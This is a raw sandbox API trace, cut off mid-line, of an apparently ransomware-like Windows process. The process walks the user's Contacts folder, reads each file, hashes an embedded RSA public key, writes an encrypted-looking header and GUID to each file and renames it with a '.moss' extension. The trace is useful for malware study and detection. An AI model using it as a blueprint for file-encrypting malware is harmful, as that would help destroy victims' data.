GetTickCount () returned 0x11597dd [0168.730] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.731] GetTickCount () returned 0x11597dd [0168.731] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.732] GetTickCount () returned 0x11597dd [0168.732] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.733] GetTickCount () returned 0x11597dd [0168.733] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.734] GetTickCount () returned 0x11597ec [0168.734] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.735] GetTickCount () returned 0x11597ec [0168.735] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.736] GetTickCount () returned 0x11597ec [0168.736] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.737] GetTickCount () returned 0x11597ec [0168.737] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.738] GetTickCount () returned 0x11597ec [0168.738] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.739] GetTickCount () returned 0x11597ec [0168.739] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.740] GetTickCount () returned 0x11597ec [0168.740] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.741] GetTickCount () returned 0x11597ec [0168.741] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.742] GetTickCount () returned 0x11597ec [0168.742] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.742] GetTickCount () returned 0x11597ec [0168.743] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.743] GetTickCount () returned 0x11597ec [0168.744] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.745] GetTickCount () returned 0x11597ec [0168.745] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.746] GetTickCount () returned 0x11597ec [0168.746] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.747] GetTickCount () returned 0x11597ec [0168.747] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.747] GetTickCount () returned 0x11597ec [0168.748] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.748] GetTickCount () returned 0x11597fc [0168.748] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.749] GetTickCount () returned 0x11597fc [0168.749] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.750] GetTickCount () returned 0x11597fc [0168.750] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.751] GetTickCount () returned 0x11597fc [0168.751] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.752] GetTickCount () returned 0x11597fc [0168.752] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.753] GetTickCount () returned 0x11597fc [0168.753] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.754] GetTickCount () returned 0x11597fc [0168.754] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.755] GetTickCount () returned 0x11597fc [0168.755] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.756] GetTickCount () returned 0x11597fc [0168.756] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.757] GetTickCount () returned 0x11597fc [0168.757] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.757] GetTickCount () returned 0x11597fc [0168.758] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.758] GetTickCount () returned 0x11597fc [0168.758] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.759] GetTickCount () returned 0x11597fc [0168.759] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.760] GetTickCount () returned 0x11597fc [0168.760] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.761] GetTickCount () returned 0x11597fc [0168.761] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.762] GetTickCount () returned 0x11597fc [0168.762] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.763] GetTickCount () returned 0x11597fc [0168.763] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.764] GetTickCount () returned 0x11597fc [0168.764] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.765] GetTickCount () returned 0x115980c [0168.765] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.766] GetTickCount () returned 0x115980c [0168.766] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.767] GetTickCount () returned 0x115980c [0168.767] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.767] GetTickCount () returned 0x115980c [0168.767] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.768] GetTickCount () returned 0x115980c [0168.768] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.769] GetTickCount () returned 0x115980c [0168.769] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.770] GetTickCount () returned 0x115980c [0168.770] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.771] GetTickCount () returned 0x115980c [0168.771] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.772] GetTickCount () returned 0x115980c [0168.772] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.773] GetTickCount () returned 0x115980c [0168.773] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.774] GetTickCount () returned 0x115980c [0168.774] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.774] GetTickCount () returned 0x115980c [0168.774] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.775] GetTickCount () returned 0x115980c [0168.859] FreeLibrary (hLibModule=0x76d30000) returned 1 [0168.859] QueryPerformanceCounter (in: lpPerformanceCount=0x401efa4 | out: lpPerformanceCount=0x401efa4*=28873943719) returned 1 [0168.859] GlobalMemoryStatus (in: lpBuffer=0x401f414 | out: lpBuffer=0x401f414) [0168.862] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.862] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0168.862] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.862] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0168.862] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0168.862] CloseHandle (hObject=0x664) returned 1 [0168.864] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.moss")) returned 1 [0168.866] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.866] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.866] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.867] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0168.867] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0168.868] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0168.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0168.868] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=68382) returned 1 [0168.868] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0168.871] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.871] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0168.876] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0168.877] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.877] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.877] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.877] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0168.879] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0168.879] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0168.879] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0168.879] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0168.879] GetLastError () returned 0x0 [0168.879] SetLastError (dwErrCode=0x0) [0168.879] GetLastError () returned 0x0 [0168.879] SetLastError (dwErrCode=0x0) [0168.879] GetLastError () returned 0x0 [0168.879] SetLastError (dwErrCode=0x0) [0168.879] GetLastError () returned 0x0 [0168.879] SetLastError (dwErrCode=0x0) [0168.879] GetLastError () returned 0x0 [0168.879] SetLastError (dwErrCode=0x0) [0168.879] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] GetLastError () returned 0x0 [0168.880] SetLastError (dwErrCode=0x0) [0168.880] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0168.880] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0168.880] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0168.881] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0168.881] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0168.882] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0168.883] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.883] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0168.883] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0168.883] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0168.883] CloseHandle (hObject=0x664) returned 1 [0168.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0168.885] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.moss")) returned 1 [0168.886] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0168.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0168.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0168.886] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0168.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0168.887] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1171) returned 1 [0168.887] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0168.889] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.889] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0168.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.891] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x493, lpOverlapped=0x0) returned 1 [0168.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0168.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.891] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0168.892] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0168.892] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0168.892] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0168.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0168.892] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0168.892] GetLastError () returned 0x0 [0168.892] SetLastError (dwErrCode=0x0) [0168.892] GetLastError () returned 0x0 [0168.892] SetLastError (dwErrCode=0x0) [0168.892] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] GetLastError () returned 0x0 [0168.893] SetLastError (dwErrCode=0x0) [0168.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.893] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.894] GetLastError () returned 0x0 [0168.894] SetLastError (dwErrCode=0x0) [0168.895] GetLastError () returned 0x0 [0168.895] SetLastError (dwErrCode=0x0) [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.895] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0168.895] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0168.895] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0168.895] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.895] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x490) returned 0x3b447b0 [0168.895] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44c48 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbd0 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbba0 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc18 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, 